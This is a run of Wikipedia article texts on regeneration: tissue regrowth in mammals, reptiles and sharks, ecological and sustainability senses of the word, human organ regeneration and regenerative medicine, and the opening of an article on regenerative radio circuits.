Mammals are capable of cellular and physiological regeneration, but have generally poor reparative regenerative ability across the group. [ 1 ] [ 27 ] Examples of physiological regeneration in mammals include epithelial renewal (e.g., skin and intestinal tract), red blood cell replacement, antler regeneration and hair cycling. [ 81 ] [ 82 ] Male deer lose their antlers annually during the months of January to April then through regeneration are able to regrow them as an example of physiological regeneration. A deer antler is the only appendage of a mammal that can be regrown every year. [ 83 ] While reparative regeneration is a rare phenomenon in mammals, it does occur. A well-documented example is regeneration of the digit tip distal to the nail bed. [ 84 ] Reparative regeneration has also been observed in rabbits, pikas and African spiny mice. In 2012, researchers discovered that two species of African spiny mice , Acomys kempi and Acomys percivali , were capable of completely regenerating the autotomically released or otherwise damaged tissue. These species can regrow hair follicles, skin, sweat glands , fur and cartilage. [ 85 ] In addition to these two species, subsequent studies demonstrated that Acomys cahirinus could regenerate skin and excised tissue in the ear pinna. [ 86 ] [ 87 ]
Despite these examples, it is generally accepted that adult mammals have limited regenerative capacity compared to most vertebrate embryos/larvae, adult salamanders and fish. [ 88 ] But the regeneration therapy approach of Robert O. Becker , using electrical stimulation, has shown promising results for rats [ 89 ] and mammals in general. [ 90 ]
Some researchers have also claimed that the MRL mouse strain exhibits enhanced regenerative abilities. Work comparing the differential gene expression of scarless healing MRL mice and a poorly-healing C57BL/6 mouse strain, identified 36 genes differentiating the healing process between MRL mice and other mice. [ 91 ] [ 92 ] Study of the regenerative process in these animals is aimed at discovering how to duplicate them in humans, such as deactivation of the p21 gene. [ 93 ] [ 94 ] However, recent work has shown that MRL mice actually close small ear holes with scar tissue, rather than regeneration as originally claimed. [ 86 ]
MRL mice are not protected against myocardial infarction ; heart regeneration in adult mammals ( neocardiogenesis ) is limited, because heart muscle cells are nearly all terminally differentiated . MRL mice show the same amount of cardiac injury and scar formation as normal mice after a heart attack. [ 95 ] However, recent studies provide evidence that this may not always be the case, and that MRL mice can regenerate after heart damage. [ 96 ]
The regrowth of lost tissues or organs in the human body is being researched. Some tissues such as skin regrow quite readily; others have been thought to have little or no capacity for regeneration, but ongoing research suggests that there is some hope for a variety of tissues and organs. [ 1 ] [ 97 ] Human organs that have been regenerated include the bladder, vagina and the penis. [ 98 ]
As are all metazoans , humans are capable of physiological regeneration (i.e. the replacement of cells during homeostatic maintenance that does not necessitate injury). For example, the regeneration of red blood cells via erythropoiesis occurs through the maturation of erythrocytes from hematopoietic stem cells in the bone marrow, their subsequent circulation for around 90 days in the blood stream, and their eventual cell-death in the spleen. [ 99 ] Another example of physiological regeneration is the sloughing and rebuilding of a functional endometrium during each menstrual cycle in females in response to varying levels of circulating estrogen and progesterone. [ 100 ]
However, humans are limited in their capacity for reparative regeneration, which occurs in response to injury. One of the most studied regenerative responses in humans is the hypertrophy of the liver following liver injury. [ 101 ] [ 102 ] For example, the original mass of the liver is re-established in direct proportion to the amount of liver removed following partial hepatectomy, [ 103 ] which indicates that signals from the body regulate liver mass precisely, both positively and negatively, until the desired mass is reached. This response is considered cellular regeneration (a form of compensatory hypertrophy) where the function and mass of the liver is regenerated through the proliferation of existing mature hepatic cells (mainly hepatocytes ), but the exact morphology of the liver is not regained. [ 102 ] This process is driven by growth factor and cytokine regulated pathways. [ 101 ] The normal sequence of inflammation and regeneration does not function accurately in cancer. Specifically, cytokine stimulation of cells leads to expression of genes that change cellular functions and suppress the immune response. [ 104 ]
Adult neurogenesis is also a form of cellular regeneration. For example, hippocampal neuron renewal occurs in normal adult humans at an annual turnover rate of 1.75% of neurons. [ 105 ] Cardiac myocyte renewal has been found to occur in normal adult humans, [ 106 ] and at a higher rate in adults following acute heart injury such as infarction. [ 107 ] Even in adult myocardium following infarction, proliferation is only found in around 1% of myocytes around the area of injury, which is not enough to restore function of cardiac muscle . However, this may be an important target for regenerative medicine as it implies that regeneration of cardiomyocytes, and consequently of myocardium, can be induced.
Another example of reparative regeneration in humans is fingertip regeneration, which occurs after phalanx amputation distal to the nail bed (especially in children) [ 108 ] [ 109 ] and rib regeneration, which occurs following osteotomy for scoliosis treatment (though usually regeneration is only partial and may take up to one year). [ 110 ]
Yet another example of regeneration in humans is vas deferens regeneration, which occurs after a vasectomy and which results in vasectomy failure. [ 111 ]
The ability and degree of regeneration in reptiles differs among the various species (see [ 112 ] ), but the most notable and well-studied occurrence is tail-regeneration in lizards . [ 113 ] [ 114 ] [ 115 ] In addition to lizards, regeneration has been observed in the tails and maxillary bone of crocodiles and adult neurogenesis has also been noted. [ 113 ] [ 116 ] [ 117 ] Tail regeneration has never been observed in snakes , but see. [ 112 ] Lizards possess the highest regenerative capacity as a group. [ 114 ] [ 115 ] [ 118 ] Following autotomous tail loss, epimorphic regeneration of a new tail proceeds through a blastema-mediated process that results in a functionally and morphologically similar structure. [ 113 ] [ 114 ]
It has been estimated that the average shark loses about 30,000 to 40,000 teeth in a lifetime. Leopard sharks routinely replace their teeth every 9–12 days and this is an example of physiological regeneration. This can occur because shark teeth are not attached to a bone, but instead are developed within a bony cavity. [ 75 ]
Rhodopsin regeneration has been studied in skates and rays. After complete photo-bleaching, rhodopsin can completely regenerate within 2 hours in the retina . [ 119 ]
White bamboo sharks can regenerate at least two-thirds of their liver and this has been linked to three micro RNAs, xtr-miR-125b, fru-miR-204, and has-miR-142-3p_R-. In one study, two-thirds of the liver was removed and within 24 hours more than half of the liver had undergone hypertrophy . [ 120 ]
Some sharks can regenerate scales and even skin following damage. Within two weeks of skin wounding, mucus is secreted into the wound and this initiates the healing process. One study showed that the majority of the wounded area was regenerated within 4 months, but the regenerated area also showed a high degree of variability. [ 121 ] | https://en.wikipedia.org/wiki/Regeneration_(biology) |
In ecology regeneration is the ability of an ecosystem – specifically, the environment and its living population – to renew and recover from damage. It is a kind of biological regeneration .
Regeneration refers to ecosystems replenishing what is being eaten, disturbed, or harvested. Regeneration's biggest force is photosynthesis which transforms sun energy and nutrients into plant biomass. Resilience to minor disturbances is one characteristic feature of healthy ecosystems. Following major (lethal) disturbances, such as a fire or pest outbreak in a forest, an immediate return to the previous dynamic equilibrium will not be possible. Instead, pioneering species will occupy, compete for space, and establish themselves in the newly opened habitat. The new growth of seedlings and community assembly process is known as regeneration in ecology . [ 1 ] [ 2 ] As ecological succession sets in, a forest will slowly regenerate towards its former state within the succession ( climax or any intermediate stage), provided that all outer parameters (climate, soil fertility availability of nutrients , animal migration paths, air pollution or the absence thereof, etc.) remain unchanged.
In certain regions like Australia , natural wildfire is a necessary condition for a cyclically stable ecosystem with cyclic regeneration.
While natural disturbances are usually fully compensated by the rules of ecological succession, human interference can significantly alter the regenerative homeostatic faculties of an ecosystem up to a degree that self-healing will not be possible. For regeneration to occur, active restoration must be attempted. | https://en.wikipedia.org/wiki/Regeneration_(ecology) |
Regeneration refers to rethinking and reinventing business models , supply chains , and lifestyles to sustain and improve the earth's natural environment and avoid the depletion of natural resources. [ 1 ] Regeneration includes widespread environmental practices such as reusing , recycling , restoring, and the use of renewable resources .
The modern environmental movement gained traction in the early 1970s following the United Nations Conference on the Human Environment , the first time multiple nations joined together to discuss the state of the world's environment. [ citation needed ]
The concept of a generation that includes people of all ages who share a common interest in the environment was first introduced by Dell Chairman and CEO Michael Dell on World Environment Day 2007. [ citation needed ] Many of the original theories of change came from writers, thinkers, and designers such as Wendell Berry , Buckminster Fuller , David Orr and Frank Lloyd Wright . These individuals saw a shift happening in humanity toward a rekindled connection with nature and inspired monumental changes in our approach and perspectives on topics such as building community, our relationship with agriculture and architecture, as well as the disconnect between modern economics on a finite planet. [ citation needed ]
Thought leaders like Paul Hawken , Kate Raworth , Naomi Klein , David Suzuki , and Bill McKibben have modernized the discourse and given the environmental movement a new set of tools in the form of conscious capitalism and positive climate communication . [ citation needed ] | https://en.wikipedia.org/wiki/Regeneration_(sustainability) |
Regeneration in humans is the regrowth of lost tissues or organs in response to injury. This is in contrast to wound healing , or partial regeneration, which involves closing up the injury site with some gradation of scar tissue. Some tissues such as skin, the vas deferens , and large organs including the liver can regrow quite readily, while others have been thought to have little or no capacity for regeneration following an injury.
Numerous tissues and organs have been induced to regenerate. Bladders have been 3D-printed in the lab since 1999. Skin tissue can be regenerated in vivo or in vitro . Other organs and body parts that have been procured to regenerate include: penis, fats, vagina, brain tissue, thymus, and a scaled down human heart. One goal of scientists is to induce full regeneration in more human organs.
There are various techniques that can induce regeneration. By 2016, regeneration of tissue had been induced and operationalized by science. There are four main techniques: regeneration by instrument; [ 1 ] regeneration by materials; [ 2 ] [ 3 ] regeneration by drugs [ 4 ] [ 5 ] [ 6 ] and regeneration by in vitro 3D printing. [ 3 ]
In humans with non-injured tissues, the tissue naturally regenerates over time; by default, new available cells replace expended cells. For example, the body regenerates a full bone within ten years, while non-injured skin tissue is regenerated within two weeks. [ 2 ] With injured tissue, the body usually has a different response. This emergency response usually involves building a degree of scar tissue over a time period longer than a regenerative response, as has been proven clinically [ 7 ] and via observation. [ clarification needed ] There are many more historical and nuanced understandings about regeneration processes. In full thickness wounds that are under 2mm, regeneration generally occurs before scarring. [ 8 ] In 2008, in full thickness wounds over 3mm, it was found that a wound needed a material [ clarify ] inserted in order to induce full tissue regeneration. [ 9 ] [ 10 ]
Whereas 3rd degree burns heal slowly by scarring, in 2016 it was known that full thickness fractional photothermolysis holes heal without scarring. [ 1 ] Up to 40% of full thickness skin can be removed without scarring in an area, in a fractional pattern via coring of tissue. [ 1 ]
Some human organs and tissues regenerate rather than simply scar, as a result of injury. These include the liver, fingertips, and endometrium. More information is now known regarding the passive replacement of tissues in the human body, as well as the mechanics of stem cells . Advances in research have enabled the induced regeneration of many more tissues and organs than previously thought possible. The aim for these techniques is to use these techniques in the near future for the purpose of regenerating any tissue type in the human body. [ citation needed ]
By 2016, regeneration had been operationalised and induced by four main techniques: regeneration by instrument; [ 1 ] regeneration by materials; [ 2 ] [ 3 ] regeneration by 3D printing; [ 3 ] and regeneration by drugs. [ 4 ] [ 5 ] [ 6 ] By 2016, regeneration by instrument, regeneration by materials and by regeneration drugs had been generally operationalised in vivo (inside living tissues), while regeneration by 3D printing had been generally operationalised in vitro (inside the lab) in order to create and prepare tissue for transplantation . [ 3 ]
A cut by a knife or a scalpel generally scars, though a piercing by a needle does not. [ 1 ] [ 11 ] In 1976, a 3 by 3 cm scar on a non-diabetic was regenerated by insulin injections and the researchers, highlighting earlier research, argued that the insulin was regenerating the tissue. [ 4 ] [ 5 ] The anecdotal evidence also highlighted that a syringe was one of two variables that helped bring regeneration of the arm scar. [ 4 ] The syringe was injected into the four quadrants three times a day for eighty-two days. [ 4 ] After eighty-two days, after many consecutive injections, the scar was resolved and it was noted no scar was observable by the human eye. [ 4 ] After seven months the area was checked again and it was once again noted that no scar could be seen. [ 4 ]
In 1997, it was proven that wounds created with an instrument that are under 2mm can heal scar free, [ 8 ] [ failed verification ] but larger wounds that are larger than 2mm healed with a scar. [ 8 ] [ failed verification ]
In 2013, it was proven in pig tissue that full thickness micro columns of tissue, less than 0.5mm in diameter could be removed and that the replacement tissue, was regenerative tissue, not scar. The tissue was removed in a fractional pattern, with over 40% of a square area removed; and all of the fractional full thickness holes in the square area healed without scarring. [ 12 ] In 2016 this fractional pattern technique was also proven in human tissue. [ 1 ] In 2021, more people were paying attention to the possibility of scar free healing alongside new technologies involving instruments. [ 13 ]
Generally, humans can regenerate injured tissues in vivo for limited distances of up to 2mm. The further the wound distance is from 2mm the more the wound regeneration will need inducement. By 2009, via the use of materials, a max induced regeneration could be achieved inside a 1 cm tissue rupture. [ 2 ] Bridging the wound, the material allowed cells to cross the wound gap; the material then degraded. This technology was first used inside a broken urethra in 1996. [ 2 ] [ 3 ] In 2012, using materials, a full urethra was restored in vivo. [ 3 ]
Macrophage polarization is a strategy for skin regeneration. [ 14 ] Macrophages are differentiated from circulating monocytes. [ 14 ] Macrophages display a range of phenotypes varying from the M1, pro-inflammatory type to the M2, pro-regenerative type. [ 14 ] Material hydrogels polarise macrophages into the key M2 regenerative phenotype in vitro. [ 14 ] In 2017, hydrogels provided full regeneration of skin, with hair follicles, after partial excision of scars in pigs and after full thickness wound incisions in pigs. [ 14 ]
In 2009, the regeneration of hollow organs and tissues with a long diffusion distance, was a little more challenging. Therefore, to regenerate hollow organs and tissues with a long diffusion distance, the tissue had to be regenerated inside the lab, via the use of a 3D printer. [ 2 ]
Various tissues that have been regenerated by in vitro 3D printing include:
Extrusion based printing is a type of printing in which material is pushed through a nozzle and extruded onto a surface or medium. While material is being extruded, either the nozzle or the print bed is moved so that the material can be placed in complex shapes across it medium. Layers upon layers of material are placed until a 3D structure is formed. The extruded material comes out as a liquid and is solidified through varies means depending on the chemical or physical properties of the material. For example, the material could be solidified through the use of photoreceptive polymerization, in which light activates the material to solidify. The material could also be hardened through the use of chemicals or enzymes. [ 20 ] Some examples of bioinks used in extrusion based printing include some alginates, hyaluronic acid, and gellan gum. [ 21 ]
Inkjet printing is similar to extrusion-based printing in that layers of materials are placed upon one another and can be hardened using various methods. Ink jet based printing differs however, in that the material is sprayed in droplets to selective locations to form layers, rather than placed as a stream of material. Inkjet printers can often contain multiple types of inks at once and can rapidly switch between them. [ 20 ] Examples of bioinks used in inkjet based printing are fibrinogen and hydroxy-apatite. [ 21 ]
SLA printing is a method in which a laser is shined upon a photoreactive liquid material to harden or polymerize. Instead of material being pushed through a nozzle or jet, material sits in a large basin and is slowly hardened. Due to its use of light to harden the material, SLA printers can offer a very high resolution at a lower speed when compared to other methods. This method is often used for protein scaffolding and providing structural support for other printed biological materials. [ 20 ] Examples of bioinks used in SLA printers include fibrin, collagen, and some alginates. [ 21 ]
With printing tissues, by 2012, there were four accepted standard levels of regenerative complexity that were acknowledged in various academic institutions:
In 2012, within 60 days it was possible, inside the lab, to grow tissue the size of half a postage stamp to the size of a football field. Most cell types could be grown and expanded outside of the body, with the exception of the liver, nerve and pancreas, as these tissue types need stem cell populations. [ 3 ]
In 2024, researchers were able to 3D print a human heart with a biphasic bioink containing pluripotent stem cells (PSC). The technique they proposed and tested would first print the external features of the organ before then printing the internal features such as internal vasculature inside the previously printed structure. Both sets of printing were performed by extruding the bioink filament into layered structures set in a microgel medium. This technique was called the “SPIRIT” technique and allowed for the printing of a full-sized heart at significantly faster speeds than previous methods. [ 22 ]
In 2022, researchers proposed a new method for printing vascularized human liver tissue. This new method consisted of using a 3D printer capable of holding seven different bioinks, with the ability to switch rapidly between these different bioinks to print different structures and shapes in the liver tissue. Due to the overall complexity of the organ, they were unable to print an entire liver but were still able to successfully print pieces of densely vascularized liver tissue. [ 20 ] [ 22 ]
A new technique for 3D printing kidney tissue was developed in 2020 which resulted in the successful creation of a miniature, vascularized kidney. To do this, they used an extrusion method printer that could be fed two bioinks and would extrude the bioink as hollow tubes with one tube coating the other. In 2021, researchers expanded upon this technique by using PSCs differentiated into the correct cell type in the bioink. Using the PSC’s allowed for increased vascularization, as the PSCs would differentiate into the correct cell types to build the structures of the blood vessels, rather than already differentiated cells having to be placed in the right locations. [ 20 ] [ 22 ]
In 2019, a method for printing alveoli was developed in which 2D slices of photosensitive hydrogel are successively cured to form a 3D structure of the alveoli. This produces a soft material that is able to easily expand and contract, while also maintaining biocompatibility. The level of curing for the hydrogel is controlled using additive food coloring which absorbs light and increases the curing at that location. This allows the curing to be directed to better form 3D shapes. This method was able to form functional and vascularized alveoli. In 2021, this technique was improved by using an inkjet printing method, which increased the accuracy and precision of alveolar structure. With this ink-jet method, researchers were able to create functional portions of alveolar tissue with increased stability and surfactant secretion. [ 20 ] [ 22 ]
In 2020, researchers developed a method for tissue repair of male genitals through the use of a bioink they designed. This bioink would include stem cells along with the ink itself to increase its compatibility with the body and its ability to heal. A hydrogel scaffold was printed using a 3D print-ultraviolet photo crosslinking strategy, which is similar in concept to an SLA printer. Their design was able to successfully be integrated the corpus cavernosum of a rabbit’s penis. This printed structure was able to return functionality to the organ and increase its fertility. While not tested or created using human cells, further efforts are being conducted to improve this field. [ 22 ]
Lipoatrophy is the localised loss of fat in tissue. It is common in diabetics who use conventional insulin injection treatment. [ 4 ] In 1949, a much more pure form of insulin was, instead of causing lipoatrophy, shown to regenerate the localised loss of fat after injections in to diabetics. [ 4 ] In 1984, it was shown that different insulin injections have different regenerative responses with regards to creating skin fats in the same person. [ 5 ] It was shown in the same body that conventional forms of insulin injections cause lipoatrophy and highly purified insulin injections cause lipohypertrophy . [ 5 ] In 1976, the regenerative response was shown to work in a non-diabetic after a 3 x 3 cm lipoatrophic arm scar was treated with pure monocomponent porcine soluble insulin. [ 5 ] [ 4 ] A syringe injected insulin under the skin equally in the four quadrants of the defect. [ 4 ] To layer four units of insulin evenly into the base of the defect, each quadrant of the defect received one unit of insulin three times a day, for eighty-two days. [ 4 ] After eighty-two days of consecutive injections the defect regenerated to normal tissue. [ 4 ] [ 5 ]
In 2016, scientists could transform a skin cell into any other tissue type via the use of drugs. [ 6 ] The technique was noted as safer than genetic reprogramming which, in 2016, was a concern medically. [ 6 ] The technique, used a cocktail of chemicals and enabled efficient on site regeneration without any genetic programming. [ 6 ] In 2016, it was hoped to one day use this drug to regenerate tissue at the site of tissue injury. [ 6 ] In 2017, scientists could turn many cell types (such as brain and heart) into skin. [ 23 ]
Scientists found leprosy -causing bacteria viably regenerate and rejuvenate the liver in its armadillos hosts, which may enable novel human therapies based on knowledge or components gained from naturally evolved organisms or capabilities. [ 24 ] [ 25 ]
Cardiomyocyte necrosis activates an inflammatory response that serves to clear the injured myocardium from dead cells, and stimulates repair, but may also extend injury. Research suggests that the cell types involved in the process play an important role. Namely monocyte-derived macrophages tend to induce inflammation while inhibiting cardiac regeneration, while tissue resident macrophages may help restoration of tissue structure and function. [ 26 ]
The endometrium after the process of breakdown via the menstruation cycle , re-epithelializes swiftly and regenerates. [ 27 ] Though tissues with a non-interrupted morphology, like non-injured soft tissue, completely regenerate consistently; the endometrium is the only human tissue that completely regenerates consistently after a disruption and interruption of the morphology. [ 27 ] The inner lining of the uterus is the only adult tissue to undergo rapid cyclic shedding and regeneration without scarring, shedding and restoring roughly inside a 7-day window on a monthly basis. [ 28 ] All other adult tissues, upon rapid shedding or injury, can scar. [ citation needed ]
In May 1932, L. H. McKim published a report describing the regeneration of an adult digit-tip following amputation. A house surgeon in the Montreal General Hospital underwent amputation of the distal phalanx to stop the spread of an infection. In less than one month following surgery, x-ray analysis showed the regrowth of bone while macroscopic observation showed the regrowth of nail and skin. [ 29 ] This is one of the earliest recorded examples of adult human digit-tip regeneration. [ 30 ]
Studies in the 1970s showed that children up to the age of 10 or so who lose fingertips in accidents can regrow the tip of the digit within a month provided their wounds are not sealed up with flaps of skin – the de facto treatment in such emergencies. They normally will not have a fingerprint , and if there is any piece of the finger nail left it will grow back as well, usually in a square shape rather than round. [ 31 ] [ 32 ]
In August 2005, Lee Spievack, then in his early sixties, accidentally sliced off the tip of his right middle finger just above the first phalanx . His brother, Dr. Alan Spievack, was researching regeneration and provided him with powdered extracellular matrix , developed by Dr. Stephen Badylak of the McGowan Institute of Regenerative Medicine . Mr. Spievack covered the wound with the powder, and the tip of his finger re-grew in four weeks. [ 33 ] The news was released in 2007. Ben Goldacre has described this as "the missing finger that never was", claiming that fingertips regrow and quoted Simon Kay , professor of hand surgery at the University of Leeds , who from the picture provided by Goldacre described the case as seemingly "an ordinary fingertip injury with quite unremarkable healing" [ 34 ]
A similar story was reported by CNN. A woman named Deepa Kulkarni lost the tip of her little finger and was initially told by doctors that nothing could be done. Her personal research and consultation with several specialists including Badylak eventually resulted in her undergoing regenerative therapy and regaining her fingertip. [ 35 ]
Regenerative capacity of the kidney has been recently explored. [ 36 ]
The basic functional and structural unit of the kidney is nephron , which is mainly composed of four components: the glomerulus, tubules, the collecting duct and peritubular capillaries. The regenerative capacity of the mammalian kidney is limited compared to that of lower vertebrates. [ citation needed ]
In the mammalian kidney, the regeneration of the tubular component following an acute injury is well known. Recently regeneration of the glomerulus has also been documented. Following an acute injury, the proximal tubule is damaged more, and the injured epithelial cells slough off the basement membrane of the nephron. The surviving epithelial cells, however, undergo migration, dedifferentiation, proliferation, and redifferentiation to replenish the epithelial lining of the proximal tubule after injury. Recently, the presence and participation of kidney stem cells in the tubular regeneration has been shown. However, the concept of kidney stem cells is currently emerging. In addition to the surviving tubular epithelial cells and kidney stem cells, the bone marrow stem cells have also been shown to participate in regeneration of the proximal tubule, however, the mechanisms remain controversial. Studies examining the capacity of bone marrow stem cells to differentiate into renal cells are emerging. [ 37 ]
Like other organs, the kidney is also known to regenerate completely in lower vertebrates such as fish. Some of the known fish that show remarkable capacity of kidney regeneration are goldfish, skates , rays, and sharks. In these fish, the entire nephron regenerates following injury or partial removal of the kidney. [ citation needed ]
The human liver is particularly known for its ability to regenerate, and is capable of doing so from only one quarter of its tissue, [ 38 ] due chiefly to the unipotency of hepatocytes . [ 39 ] Resection of liver can induce the proliferation of the remaining hepatocytes until the lost mass is restored, where the intensity of the liver's response is directly proportional to the mass resected. For almost 80 years surgical resection of the liver in rodents has been a very useful model to the study of cell proliferation. [ 40 ] [ 41 ]
Toes damaged by gangrene and burns in older people can also regrow with the nail and toe print returning after medical treatment for gangrene. [ 42 ]
The vas deferens can grow back together after a vasectomy –thus resulting in vasectomy failure. [ 43 ] This occurs due to the fact that the epithelium of the vas deferens, similar to the epithelium of some other human body parts, is capable of regenerating and creating a new tube in the event that the vas deferens is damaged and/or severed. [ 44 ] Even when as much as five centimeters , or two inches , of the vas deferens is removed, the vas deferens can still grow back together and become reattached–thus allowing sperm to once again pass and flow through the vas deferens, restoring one's fertility . [ 44 ]
There are several human tissues that have been successfully or partially induced to regenerate. Many fall under the topic of regenerative medicine , which includes the methods and research conducted with the aim of regenerating the organs and tissues of humans as a result of injury. The major strategies of regenerative medicine include dedifferentiating injury site cells, transplanting stem cells, implanting lab-grown tissues and organs, and implanting bioartificial tissues. [ citation needed ]
In 1999, the bladder was the first regenerated organ to be given to seven patients; as of 2014, these regenerated bladders are still functioning inside the beneficiaries. [ 15 ]
In 1949, purified insulin was shown to regenerate fat in diabetics with lipoatrophy . [ 4 ] In 1976, after 82 days of consecutive injections into a scar, purified insulin was shown to safely regenerate fat and completely regenerate skin in a non-diabetic. [ 4 ] [ 5 ]
During a high-fat diet, and during hair follicle growth, mature adipocytes (fats) are naturally formed in multiple tissues. [ 45 ] Fat tissue has been implicated in the inducement of tissue regeneration. Myofibroblasts are the fibroblast responsible for scar and in 2017 it was found that the regeneration of fat transformed myofibroblasts into adipocytes instead of scar tissue. [ 46 ] [ 45 ] Scientists also identified bone morphogenetic protein (BMP) signalling as important for myofibroblasts transforming into adipocytes for the purpose of skin and fat regeneration. [ 46 ]
Cardiovascular diseases are the leading cause of death worldwide, and have increased proportionally from 25.8% of global deaths in 1990, to 31.5% of deaths in 2013. [ 47 ] This is true in all areas of the world except Africa . [ 47 ] [ 48 ] In addition, during a typical myocardial infarction or heart attack, an estimated one billion cardiac cells are lost. [ 49 ] The scarring that results is then responsible for greatly increasing the risk of life-threatening abnormal heart rhythms or arrhythmias . Therefore, the ability to naturally regenerate the heart would have an enormous impact on modern healthcare. However, while several animals can regenerate heart damage (e.g. the axolotl ), mammalian cardiomyocytes (heart muscle cells) cannot proliferate (multiply) and heart damage causes scarring and fibrosis . [ citation needed ]
Despite the earlier belief that human cardiomyocytes are not generated later in life, a recent study has found that this is not the case. This study took advantage of the nuclear bomb testing and other radioactive sources during the Atomic Age which introduced carbon-14 into the atmosphere (essentially all of which had decayed up to that point in Earth's history ) and therefore into the cells of biologically active inhabitants. [ 50 ] They extracted DNA from the myocardium of these research subjects and found that cardiomyocytes do in fact renew at a slowing rate of 1% per year from the age of 25, to 0.45% per year at the age of 75 by comparing the presence of carbon-14 with the stable and abundant carbon-12 . [ 50 ] This amounts to less than half of the original cardiomyocytes being replaced during the average lifespan. However, serious doubts have been placed on the validity of this research, including the appropriateness of the samples as representative of normally aging hearts. [ 51 ]
Further research has been conducted that supports the potential for human cardiac regeneration. Inhibition of p38 MAP kinase was found to induce mitosis in adult mammalian cardiomyocytes, [ 52 ] while treatment with FGF1 and p38 MAP kinase inhibitors was found to regenerate the heart, reduce scarring, and improve cardiac function in rats with cardiac injury. [ 53 ]
One of the most promising sources of heart regeneration is the use of stem cells. It was demonstrated in mice that there is a resident population of stem cells or cardiac progenitors in the adult heart – this population of stem cells was shown to be reprogrammed to differentiate into cardiomyocytes that replaced those lost during a heart tissue death. [ 54 ] In humans specifically, a "cardiac mesenchymal feeder layer" was found in the myocardium that renewed the cells with progenitors that differentiated into mature cardiac cells. [ 55 ] What these studies show is that the human heart contains stem cells that could potentially be induced into regenerating the heart when needed, rather than just being used to replace expended cells. [ citation needed ]
Loss of the myocardium due to disease often leads to heart failure; therefore, it would be useful to be able to take cells from elsewhere in the heart to replenish those lost. This was achieved in 2010 when mature cardiac fibroblasts were reprogrammed directly into cardiomyocyte-like cells. This was done using three transcription factors : GATA4 , Mef2c , and Tbx5 . [ 56 ] Cardiac fibroblasts make up more than half of all heart cells and are usually not able to conduct contractions (are not cardiogenic), but those reprogrammed were able to contract spontaneously. [ 56 ] The significance is that fibroblasts from the damaged heart or from elsewhere, may be a source of functional cardiomyocytes for regeneration. [ citation needed ]
Simply injecting functioning cardiac cells into a damaged heart is only partially effective. In order to achieve more reliable results, structures composed of the cells need to be produced and then transplanted. Masumoto and his team designed a method of producing sheets of cardiomyocytes and vascular cells from human iPSCs . These sheets were then transplanted onto infarcted hearts of rats, leading to significantly improved cardiac function. [ 57 ] These sheets were still found to be present four weeks later. [ 57 ] Research has also been conducted into the engineering of heart valves. Tissue-engineered heart valves derived from human cells have been created in vitro and transplanted into a non-human primate model. These showed a promising amount of cellular repopulation even after eight weeks, and succeeded in outperforming currently-used non-biological valves. [ 58 ] In 2021, researchers demonstrated a switchable iPSCs- reprogramming -based approach for regeneration of damaged heart without tumor-formation in mice. [ 59 ] In April 2019, researchers 3D printed a prototype human heart the size of a rabbit's heart. [ 19 ]
Chronic obstructive pulmonary disease (COPD) is one of the most widespread health threats today. It affects 329 million people worldwide, which makes up nearly 5% of the global population. Having killed over 3 million people in 2012, COPD was the third greatest cause of death. [ 60 ] Worse still, due to increasing smoking rates and the aging populations in many countries, the number of deaths as a result of COPD and other chronic lung diseases is predicted to continue increasing. [ 61 ] Therefore, developments in the lung's capacity for regeneration is in high demand.
It has been shown that bone marrow-derived cells could be the source of progenitor cells of multiple cell lineages, and a 2004 study suggested that one of these cell types was involved in lung regeneration. [ 62 ] Therefore, a potential source of cells for lung regeneration has been found; however, due to advances in inducing stem cells and directing their differentiation, major progress in lung regeneration has consistently featured the use of patient-derived iPSCs and bioscaffolds.
The extracellular matrix is the key to generating entire organs in vitro. It was found that by carefully removing the cells of an entire lung, a "footprint" is left behind that can guide cellular adhesion and differentiation if a population of lung epithelial cells and chondrocytes are added. [ 63 ] This has serious applications in regenerative medicine, particularly as a 2012 study successfully purified a population of lung progenitor cells that were derived from embryonic stem cells. These can then be used to re-cellularise a three-dimensional lung tissue scaffold. [ 64 ]
A 2010 investigation used the ECM scaffold to produce entire lungs in vitro to be transplanted into living rats. [ 65 ] These successfully enabled gas exchange but for short time intervals only. [ 65 ] Nevertheless, this was a huge leap towards whole lung regeneration and transplants for humans, which has already taken another step forward with the lung regeneration of a non-human primate. [ 66 ]
Cystic fibrosis is another disease of the lungs, which is highly fatal and genetically linked to a mutation in the CFTR gene . Through growing patient-specific lung epithelium in vitro, lung tissue expressing the cystic fibrosis phenotype has been achieved. [ 67 ] This is so that modelling and drug testing of the disease pathology can be carried out with the hope of regenerative medical applications. [ citation needed ]
Penises have been successfully regenerated in the lab. [ 15 ] Penises are harder to regenerate than the skin, bladder and vagina due to their structural complexity. [ 15 ]
A goal of spinal cord injury research is to promote neuroregeneration , reconnection of damaged neural circuits. [ 68 ] The nerves in the spine are a tissue that requires a stem cell population to regenerate. In 2012, a Polish fireman Darek Fidyka , with paraplegia of the spinal cord, underwent a procedure, which involved extracting olfactory ensheathing cells (OECs) from Fidyka's olfactory bulbs , and injecting these stem cells, in vivo, into the site of the previous injury. Fidyka eventually gained feeling, movement and sensation in his limbs, especially on the side where the stem cells were injected; he also reported gaining sexual function. Fidyka can now drive and can now walk some distance aided by a frame. He is believed to be the first person in the world to recover sensory function from a complete severing of the spinal nerves. [ 69 ] [ 70 ]
The thymus gland is one of the first organs to degenerate in normal healthy individuals. Researchers from the University of Edinburgh have succeeded in regenerating a living organ that closely resembles a juvenile thymus in terms of structure and gene expression profile. [ 71 ]
Between the years 2005 and 2008, four women with vaginal hypoplasia due to Müllerian agenesis were given regenerated vaginas. [ 72 ] Up to eight years after the transplants, all organs have normal function and structure. [ 15 ] | https://en.wikipedia.org/wiki/Regeneration_in_humans |
A regenerative circuit is an amplifier circuit that employs positive feedback (also known as regeneration or reaction ). [ 1 ] [ 2 ] Some of the output of the amplifying device is applied back to its input to add to the input signal, increasing the amplification. [ 3 ] One example is the Schmitt trigger (which is also known as a regenerative comparator ), but the most common use of the term is in RF amplifiers, and especially regenerative receivers , to greatly increase the gain of a single amplifier stage. [ 4 ] [ 5 ] [ 6 ]
The regenerative receiver was invented in 1912 [ 7 ] and patented in 1914 [ 8 ] by American electrical engineer Edwin Armstrong when he was an undergraduate at Columbia University . [ 9 ] It was widely used between 1915 and World War II . Advantages of regenerative receivers include increased sensitivity with modest hardware requirements, and increased selectivity because the Q of the tuned circuit will be increased when the amplifying vacuum tube or transistor has its feedback loop around the tuned circuit (via a "tickler" winding or a tapping on the coil) because it introduces some negative resistance .
